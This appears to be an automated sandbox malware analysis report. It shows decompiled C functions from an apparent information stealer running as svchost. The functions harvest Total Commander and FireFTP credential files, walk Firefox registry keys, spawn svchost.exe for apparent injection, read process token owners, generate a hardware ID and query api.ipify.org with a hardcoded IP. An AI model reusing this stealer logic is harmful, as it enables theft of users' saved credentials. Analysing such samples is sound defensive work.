                                                                                                                                        0x100048fa
                                                                                                                                        0x100048fa
                                                                                                                                        0x10004906
                                                                                                                                        0x10004908
                                                                                                                                        0x10004919
                                                                                                                                        0x10004919
                                                                                                                                        0x10004930
                                                                                                                                        0x10004939
                                                                                                                                        0x10004950
                                                                                                                                        0x10004955
                                                                                                                                        0x10004957
                                                                                                                                        0x10004959
                                                                                                                                        0x10004962
                                                                                                                                        0x1000496a
                                                                                                                                        0x1000496a
                                                                                                                                        0x10004981
                                                                                                                                        0x1000498a
                                                                                                                                        0x100049a1
                                                                                                                                        0x100049a6
                                                                                                                                        0x100049a8
                                                                                                                                        0x100049aa
                                                                                                                                        0x100049b3
                                                                                                                                        0x100049bb
                                                                                                                                        0x100049bb
                                                                                                                                        0x100049d1
                                                                                                                                        0x100049da
                                                                                                                                        0x100049f0
                                                                                                                                        0x100049f5
                                                                                                                                        0x100049f7
                                                                                                                                        0x100049f9
                                                                                                                                        0x10004a02
                                                                                                                                        0x10004a0a
                                                                                                                                        0x10004a0a
                                                                                                                                        0x10004a20
                                                                                                                                        0x10004a29
                                                                                                                                        0x10004a3f
                                                                                                                                        0x10004a44
                                                                                                                                        0x10004a44
                                                                                                                                        0x10004a46
                                                                                                                                        0x10004a48
                                                                                                                                        0x10004a51
                                                                                                                                        0x10004a59
                                                                                                                                        0x10004a59
                                                                                                                                        0x10004a6a

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 1000488C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocDirectoryLocalWindows
                                                                                                                                        • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                                                                                                                        • API String ID: 3186838798-3636168975
                                                                                                                                        • Opcode ID: d18634c9bb6d1c6cb0eb82de849c712dd61aaa34d8ec61113815d605d35f779c
                                                                                                                                        • Instruction ID: 1841f56598d541a95ca0d3fcfb5b77e248a4c61c8fe72a98e185e27357cc69d9
                                                                                                                                        • Opcode Fuzzy Hash: d18634c9bb6d1c6cb0eb82de849c712dd61aaa34d8ec61113815d605d35f779c
                                                                                                                                        • Instruction Fuzzy Hash: 13513CB9904148F9FF01DF70CC46FEC3A65EF106C0F118029BA14748BEDF71AA10AA5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 02442E90, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47processstringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02442E90(void** _a4, intOrPtr* _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				char _v348;
				int _t17;

				E024414A0( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
				lstrcatA( &_v348, "\\System32\\svchost.exe");
				_t17 = CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20); // executed
				if(_t17 != 0) {
					 *_a4 = _v20.hProcess;
					 *_a8 = _v20.hThread;
					return 1;
				}
				return 0;
			}







                                                                                                                                        0x02442ea1
                                                                                                                                        0x02442ea9
                                                                                                                                        0x02442ec1
                                                                                                                                        0x02442ed3
                                                                                                                                        0x02442ef9
                                                                                                                                        0x02442f01
                                                                                                                                        0x02442f0d
                                                                                                                                        0x02442f15
                                                                                                                                        0x00000000
                                                                                                                                        0x02442f17
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 02442EC1
                                                                                                                                        • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 02442ED3
                                                                                                                                        • CreateProcessA.KERNEL32 ref: 02442EF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateEnvironmentProcessVariablelstrcat
                                                                                                                                        • String ID: D$SystemRoot$\System32\svchost.exe
                                                                                                                                        • API String ID: 3510847443-1175289849
                                                                                                                                        • Opcode ID: 1532fa82a6ed299b517bb33e88742c0a8f42fe4033dcf22143b7513c4ac02186
                                                                                                                                        • Instruction ID: 3ceef5f2aa22a1be67eb15c9f38f6cc90bcdf86b08ea4e8420c29482648fd8a3
                                                                                                                                        • Opcode Fuzzy Hash: 1532fa82a6ed299b517bb33e88742c0a8f42fe4033dcf22143b7513c4ac02186
                                                                                                                                        • Instruction Fuzzy Hash: B4019274A80208ABF714CFD0DC46FE97378EB44705F404555BB09AF2C0EBB06A548B54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 1000781F, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000781F(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t12;
				void* _t23;
				void* _t24;
				void* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				_v8 = E100015A9(_a4, 0x25, 0);
				_t12 = E10001E6A(__eflags, 0x1a);
				_t27 = _t12;
				if(_t12 != 0) {
					E10004349(_a4, E10001E05(_t12, "\\Mozilla\\Firefox\\"), "fireFTPsites.dat", 0xbeef1000); // executed
					E10001871(_t20);
				}
				 *0x10010155 = 1;
				GetCurrentDirectoryA(0x104,  &_v269);
				E10007690(_t24, _a4,  *0x1000f159, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E10007690(_t24, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E100015EF(_t23, _t24, _t25, _t27, _a4, _v8);
			}









                                                                                                                                        0x1000781f
                                                                                                                                        0x1000781f
                                                                                                                                        0x1000781f
                                                                                                                                        0x10007834
                                                                                                                                        0x1000783e
                                                                                                                                        0x1000783e
                                                                                                                                        0x10007840
                                                                                                                                        0x1000785c
                                                                                                                                        0x10007861
                                                                                                                                        0x10007861
                                                                                                                                        0x10007866
                                                                                                                                        0x1000787c
                                                                                                                                        0x10007899
                                                                                                                                        0x100078b5
                                                                                                                                        0x100078c1
                                                                                                                                        0x100078d2

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 1000787C
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 100078C1
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(?), ref: 10001E26
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(00000000,?), ref: 10001E30
                                                                                                                                          • Part of subcall function 10001E05: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001E44
                                                                                                                                          • Part of subcall function 10001E05: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001E4D
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                                                                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                                                                                                                        • API String ID: 3007406096-624000163
                                                                                                                                        • Opcode ID: f507832c54fabc98c51fb3701593e56c0a31765a900d87e3c203c2bd16ed5f3d
                                                                                                                                        • Instruction ID: 1222045f1ebbd09bd2e39839bd94b9732ba4584a2cd9a9cee0f49f04669a997a
                                                                                                                                        • Opcode Fuzzy Hash: f507832c54fabc98c51fb3701593e56c0a31765a900d87e3c203c2bd16ed5f3d
                                                                                                                                        • Instruction Fuzzy Hash: 3201EC75A40508BAFB11DFA0CC4AFDD3A69EB543C4F404020FB48BD1ABDBB5EA909A55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 02443270, Relevance: 9.1, APIs: 6, Instructions: 83UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02443270(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				CHAR* _v28;
				union _SID_NAME_USE _v32;
				int _t31;
				int _t37;
				int _t43;

				_v12 = OpenProcess(0x400, 0, _a4);
				if(_v12 != 0) {
					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) {
						_v8 = 0;
						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed
						if(_t31 != 0 || GetLastError() != 0x7a) {
							return 0;
						} else {
							_v24 = E02441390(_v8);
							_v20 = _v24;
							_v28 = 0;
							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed
							if(_t37 != 0) {
								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
								_v28 = _t43;
							}
							E024413D0(_v24);
							return _v28;
						}
					}
					return 0;
				}
				return 0;
			}













                                                                                                                                        0x02443287
                                                                                                                                        0x0244328e
                                                                                                                                        0x024432ac
                                                                                                                                        0x024432b5
                                                                                                                                        0x024432ca
                                                                                                                                        0x024432d2
                                                                                                                                        0x00000000
                                                                                                                                        0x024432e3
                                                                                                                                        0x024432ef
                                                                                                                                        0x024432f5
                                                                                                                                        0x024432f8
                                                                                                                                        0x02443311
                                                                                                                                        0x02443319
                                                                                                                                        0x02443337
                                                                                                                                        0x0244333d
                                                                                                                                        0x0244333d
                                                                                                                                        0x02443344
                                                                                                                                        0x00000000
                                                                                                                                        0x0244334c
                                                                                                                                        0x024432d2
                                                                                                                                        0x00000000
                                                                                                                                        0x024432ae
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,024430B6,000000FF,?,00000104,?,00000104), ref: 02443281
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,024430B6,000000FF,?,00000104), ref: 024432A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: OpenProcess$Token
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2935449343-0
                                                                                                                                        • Opcode ID: f2ad358ebbd605a23bd44c364d4566edd5a53d45dbb547fcf0057f47136ccda4
                                                                                                                                        • Instruction ID: 2e44a713f8a10cab3e6d45b66a85efbbd4ff9daa6cc6d0650860fd58c3f7c33d
                                                                                                                                        • Opcode Fuzzy Hash: f2ad358ebbd605a23bd44c364d4566edd5a53d45dbb547fcf0057f47136ccda4
                                                                                                                                        • Instruction Fuzzy Hash: A63128B5E40209AFEB04DFD4D845FAF77B9BB48704F104559F605D7280DB70AA54CB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 02441ED0, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 44stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02441ED0(CHAR* _a4) {
				char _v8;
				char _v12;
				intOrPtr _t13;

				if( *((char*)(0 + "84.17.52.36")) == 0) {
					_v8 = 0;
					_t13 = E02441AB0("http://api.ipify.org", "84.17.52.36", 0x20,  &_v12); // executed
					_v8 = _t13;
					if(_v8 != 1) {
						 *((char*)(0 + "84.17.52.36")) = 0;
						lstrcpyA(_a4, "0.0.0.0");
						return 0;
					}
					 *((char*)(_v12 + "84.17.52.36")) = 0;
					lstrcpyA(_a4, "84.17.52.36");
					return 1;
				}
				lstrcpyA(_a4, "84.17.52.36");
				return 1;
			}






                                                                                                                                        0x02441ee7
                                                                                                                                        0x02441eff
                                                                                                                                        0x02441f16
                                                                                                                                        0x02441f1e
                                                                                                                                        0x02441f25
                                                                                                                                        0x02441f4f
                                                                                                                                        0x02441f5f
                                                                                                                                        0x00000000
                                                                                                                                        0x02441f65
                                                                                                                                        0x02441f2a
                                                                                                                                        0x02441f3a
                                                                                                                                        0x00000000
                                                                                                                                        0x02441f40
                                                                                                                                        0x02441ef2
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • lstrcpyA.KERNEL32(024415D2,84.17.52.36,024415D2,?), ref: 02441EF2
                                                                                                                                        • lstrcpyA.KERNEL32(024415D2,84.17.52.36,?,?,?,?,024415D2), ref: 02441F3A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpy
                                                                                                                                        • String ID: 0.0.0.0$84.17.52.36$http://api.ipify.org
                                                                                                                                        • API String ID: 3722407311-3865761857
                                                                                                                                        • Opcode ID: 1af134123fb9833c6db7e99aab3daa3018ff3dbec3abea18483887f0d015ed4f
                                                                                                                                        • Instruction ID: 62a716408156438dc11477b8a57653706e066ee8fa5640bc98fc84e747b5962b
                                                                                                                                        • Opcode Fuzzy Hash: 1af134123fb9833c6db7e99aab3daa3018ff3dbec3abea18483887f0d015ed4f
                                                                                                                                        • Instruction Fuzzy Hash: 6101DD34A40244A7F704DF68C909B9EBBA4D705749F10429AF90A9B240DFB59595C7D0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10007690, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E10007690(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
				void* _v8;
				char* _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _t37;
				long _t41;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t59;

				_t59 = __ecx;
				if(StrStrIA(_a12, _a16) != 0) {
					_t48 = E10001D2A(_a8, _a12, "PathToExe", 0); // executed
					_t49 = _t48;
					_t61 = _t49;
					if(_t49 != 0) {
						_push(_t49);
						_t51 = E100023E6(_t61, _t49);
						_t62 = _t51;
						if(_t51 != 0) {
							_v28 = _t51;
							_t54 = E10001E6A(_t62, 0x1a);
							if(E10001E6A(_t62, 0x1a) != 0) {
								E10007515(_a4, E10001E05(_t54, _a20), _v28); // executed
								E10001871(_t56);
							}
							E10001871(_v28); // executed
						}
						E10001871(); // executed
					}
				}
				_v12 = E10001888(0x800);
				_t37 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				if(_t37 == 0) {
					_v20 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t41 = RegEnumKeyExA(_v8, _v20, _v12,  &_v16, 0, 0, 0, 0); // executed
						if(_t41 != 0) {
							break;
						}
						_v24 = E10001E05(E10001DB1(_a12, "\\"), _v12);
						E10007690(_t59, _a4, _a8, _v24, _a16, _a20); // executed
						E10001871(_v24); // executed
						_v20 = _v20 + 1;
					}
					RegCloseKey(_v8); // executed
				}
				return E10001871(_v12);
			}















                                                                                                                                        0x10007690
                                                                                                                                        0x100076a3
                                                                                                                                        0x100076b2
                                                                                                                                        0x100076b7
                                                                                                                                        0x100076b7
                                                                                                                                        0x100076b9
                                                                                                                                        0x100076bb
                                                                                                                                        0x100076c2
                                                                                                                                        0x100076c2
                                                                                                                                        0x100076c4
                                                                                                                                        0x100076c6
                                                                                                                                        0x100076d0
                                                                                                                                        0x100076d2
                                                                                                                                        0x100076e5
                                                                                                                                        0x100076ea
                                                                                                                                        0x100076ea
                                                                                                                                        0x100076f2
                                                                                                                                        0x100076f2
                                                                                                                                        0x100076f7
                                                                                                                                        0x100076f7
                                                                                                                                        0x100076b9
                                                                                                                                        0x10007706
                                                                                                                                        0x10007713
                                                                                                                                        0x1000771a
                                                                                                                                        0x1000771c
                                                                                                                                        0x10007723
                                                                                                                                        0x10007723
                                                                                                                                        0x1000773f
                                                                                                                                        0x10007746
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10007760
                                                                                                                                        0x10007772
                                                                                                                                        0x1000777a
                                                                                                                                        0x1000777f
                                                                                                                                        0x1000777f
                                                                                                                                        0x10007787
                                                                                                                                        0x10007787
                                                                                                                                        0x10007795

                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.SHLWAPI(?,?), ref: 1000769C
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10007713
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 1000773F
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 10007787
                                                                                                                                          • Part of subcall function 100023E6: lstrlenA.KERNEL32(?), ref: 100023FA
                                                                                                                                          • Part of subcall function 100023E6: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 10002419
                                                                                                                                          • Part of subcall function 100023E6: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 1000242B
                                                                                                                                          • Part of subcall function 100023E6: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 1000243D
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(?), ref: 10001E26
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(00000000,?), ref: 10001E30
                                                                                                                                          • Part of subcall function 10001E05: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001E44
                                                                                                                                          • Part of subcall function 10001E05: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001E4D
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                                                                                                                        • String ID: PathToExe
                                                                                                                                        • API String ID: 3012581338-1982016430
                                                                                                                                        • Opcode ID: 79b9f4464c1a45c66f256ac5816d973324aa2588fd6b094609e80367919249ee
                                                                                                                                        • Instruction ID: b87d04eaf17a26be1c320efbb673443f9811a43ecf2cc889ffd000cc849c4c7b
                                                                                                                                        • Opcode Fuzzy Hash: 79b9f4464c1a45c66f256ac5816d973324aa2588fd6b094609e80367919249ee
                                                                                                                                        • Instruction Fuzzy Hash: 8531C079D0454ABAEF02DFA0CC06FEE7A75FF143C0F104021F614650A6DB7A9A60AB65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 100027D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                        			E100027D0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				void* _v16;
				char _v277;
				void* __ebx;
				void* __ebp;
				void* _t23;
				void* _t24;
				long _t27;
				void* _t35;
				void* _t36;
				void** _t41;
				void* _t43;
				void* _t45;
				void* _t51;
				void* _t52;
				void* _t53;

				_t53 = __edx;
				_t52 = __ecx;
				_t23 = E10001D2A( *0x1000f159, "Software\\WinRAR", _a4, _a8); // executed
				_t24 = _t23;
				if(_t24 != 0) {
					return _t24;
				}
				_t51 = 0;
				_t27 = GetTempPathA(0x104,  &_v277);
				if(_t27 == 0 || _t27 > 0x104) {
					L12:
					return _t51;
				} else {
					E10001000( &_v8, _t52, _t53,  &_v8);
					if(E10002582( &_v277) != 0) {
						_t35 = E10001DB1( &_v277, _a4);
					} else {
						_t35 = E10001E05(E10001DB1( &_v277, "\\"), _a4);
					}
					_push(_t35);
					_t36 = E10001230(_t35, _t53, _t35, _v8); // executed
					_t37 = _t36;
					if(_t36 != 0) {
						_v12 = E10001091(_t37, _t51, _t53, _v8);
						if(_v12 != 0) {
							_t41 =  &_v16;
							_push(_t41);
							_push(_v8);
							L1000BA64();
							if(_t41 >= 0) {
								_t43 = GlobalLock(_v16);
								if(_t43 != 0) {
									_t51 = E10001888(_v12);
									_t45 = _t43;
									E100018BF(_t45, _t51, _v12);
									GlobalUnlock(_v16);
									_push(_v12);
									_pop( *__eax);
								}
							}
						}
					}
					E10001026(E10001871(), _t51, _t52, _t53, _v8);
					goto L12;
				}
			}




















                                                                                                                                        0x100027d0
                                                                                                                                        0x100027d0
                                                                                                                                        0x100027eb
                                                                                                                                        0x100027f0
                                                                                                                                        0x100027f2
                                                                                                                                        0x100028d4
                                                                                                                                        0x100028d4
                                                                                                                                        0x100027f8
                                                                                                                                        0x1000280b
                                                                                                                                        0x1000280d
                                                                                                                                        0x100028d0
                                                                                                                                        0x00000000
                                                                                                                                        0x1000281e
                                                                                                                                        0x10002822
                                                                                                                                        0x10002835
                                                                                                                                        0x1000285d
                                                                                                                                        0x10002837
                                                                                                                                        0x1000284c
                                                                                                                                        0x1000284c
                                                                                                                                        0x10002862
                                                                                                                                        0x10002867
                                                                                                                                        0x1000286c
                                                                                                                                        0x1000286e
                                                                                                                                        0x10002878
                                                                                                                                        0x1000287f
                                                                                                                                        0x10002881
                                                                                                                                        0x10002884
                                                                                                                                        0x10002885
                                                                                                                                        0x10002888
                                                                                                                                        0x1000288f
                                                                                                                                        0x10002899
                                                                                                                                        0x1000289b
                                                                                                                                        0x100028a6
                                                                                                                                        0x100028a8
                                                                                                                                        0x100028ae
                                                                                                                                        0x100028b6
                                                                                                                                        0x100028be
                                                                                                                                        0x100028c1
                                                                                                                                        0x100028c1
                                                                                                                                        0x1000289b
                                                                                                                                        0x1000288f
                                                                                                                                        0x1000287f
                                                                                                                                        0x100028cb
                                                                                                                                        0x00000000
                                                                                                                                        0x100028cb

                                                                                                                                        APIs
                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 10002806
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 10002888
                                                                                                                                        • GlobalLock.KERNEL32 ref: 10002894
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,00000104,?), ref: 100028B6
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(?), ref: 10001E26
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(00000000,?), ref: 10001E30
                                                                                                                                          • Part of subcall function 10001E05: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001E44
                                                                                                                                          • Part of subcall function 10001E05: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001E4D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                                                                                                                                        • String ID: Software\WinRAR
                                                                                                                                        • API String ID: 2536169780-224198155
                                                                                                                                        • Opcode ID: 3da94f2e42828e5cfac39993ff84f161047426bdbaa571987ef003aa2186e0cf
                                                                                                                                        • Instruction ID: 46b00ebf58113241f6c1fab732dd0f6279f58fa6253cb30bb0caeb6f346b3a42
                                                                                                                                        • Opcode Fuzzy Hash: 3da94f2e42828e5cfac39993ff84f161047426bdbaa571987ef003aa2186e0cf
                                                                                                                                        • Instruction Fuzzy Hash: F521DC7A900509BAFF01DBE0DC96DDDBBB9EF042C4F5084A1B610E106ADB75AB549B20
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.13%

                                                                                                                                        Function 10004462, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                        			E10004462(void* __ecx, void* __edx) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed short _v14;
				signed short _v16;
				char _v20;
				char _v120;
				char _v124;
				void* _t19;
				char* _t21;

				_t19 = E100027D0(__ecx, __edx, "HWID",  &_v124); // executed
				_push(_t19);
				if(_t19 == 0 || _v124 <= 0x14) {
					_t21 =  &_v20;
					_push(_t21);
					L1000BA6A();
					if(_t21 >= 0) {
						wsprintfA( &_v120, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v20, _v16 & 0x0000ffff, _v14 & 0x0000ffff, _v12 & 0x000000ff, _v11 & 0x000000ff, _v10 & 0x000000ff, _v9 & 0x000000ff, _v8 & 0x000000ff, _v7 & 0x000000ff, _v6 & 0x000000ff, _v5 & 0x000000ff);
						E100026B6("HWID",  &_v120, lstrlenA( &_v120)); // executed
					}
				}
				return E10001871();
			}


















                                                                                                                                        0x10004471
                                                                                                                                        0x10004476
                                                                                                                                        0x10004479
                                                                                                                                        0x10004481
                                                                                                                                        0x10004484
                                                                                                                                        0x10004485
                                                                                                                                        0x1000448c
                                                                                                                                        0x100044cc
                                                                                                                                        0x100044e7
                                                                                                                                        0x100044e7
                                                                                                                                        0x1000448c
                                                                                                                                        0x100044f2

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100027D0: GetTempPathA.KERNEL32(00000104,?), ref: 10002806
                                                                                                                                          • Part of subcall function 100027D0: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 10002888
                                                                                                                                          • Part of subcall function 100027D0: GlobalLock.KERNEL32 ref: 10002894
                                                                                                                                          • Part of subcall function 100027D0: GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,00000104,?), ref: 100028B6
                                                                                                                                        • CoCreateGuid.OLE32(?,00000000), ref: 10004485
                                                                                                                                        • wsprintfA.USER32 ref: 100044CC
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100044D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                                                                                                                        • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                                                                                        • API String ID: 1852535927-1100116640
